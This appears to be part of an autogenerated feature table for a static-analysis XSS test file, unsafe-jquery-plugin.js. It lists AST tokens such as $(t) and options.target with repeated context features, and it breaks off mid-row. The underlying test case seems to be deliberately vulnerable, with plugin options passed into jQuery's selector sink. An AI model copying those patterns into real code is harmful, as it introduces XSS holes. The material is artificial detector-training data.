autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:4 | $ | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | $(t) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | $(t) | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | $(t) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | $(t) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | exceptional return of $(t) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | exceptional return of $(t) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | exceptional return of $(t) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:7 | exceptional return of $(t) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:6:90:6 | t | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:6:90:6 | t | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:6:90:6 | t | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:6:90:6 | t | contextSurroundingFunctionParameters | (o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:6:90:6 | t | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:6:90:6 | t | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:3 | f | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:3 | f | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:3 | f | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:3 | f | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | exceptional return of f(options) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | exceptional return of f(options) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | exceptional return of f(options) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | exceptional return of f(options) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | f(options) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | f(options) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | f(options) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:3:92:12 | f(options) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:5:92:11 | options | CalleeFlexibleAccessPath | f | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:5:92:11 | options | InputArgumentIndex | 0 | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:5:92:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:5:92:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:5:92:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:92:5:92:11 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:95:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:99:2 | $.fn.my ... / OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:99:2 | $.fn.my ... / OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:99:2 | $.fn.my ... / OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:2:99:2 | $.fn.my ... / OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:4:95:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:4:95:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:4:95:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:4:95:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:7:95:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:7:95:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:7:95:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:7:95:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:95:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:95:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:95:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:95:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | functio ... / OK\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | functio ... / OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | functio ... / OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | functio ... / OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | functio ... / OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:19:99:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:28:95:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:28:95:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:28:95:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:28:95:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:95:38:95:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:12 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:12 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:12 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:12 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target ... .target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target ... .target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target ... .target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:7:96:29 | target ... .target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:22 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:22 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:22 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:22 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:29 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:29 | options.target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:29 | options.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:16:96:29 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:24:96:29 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:24:96:29 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:24:96:29 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:96:24:96:29 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:10 | safe | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:10 | safe | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:10 | safe | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:10 | safe | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:14 | safe.has | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:14 | safe.has | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:14 | safe.has | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:14 | safe.has | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | exceptional return of safe.has(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | exceptional return of 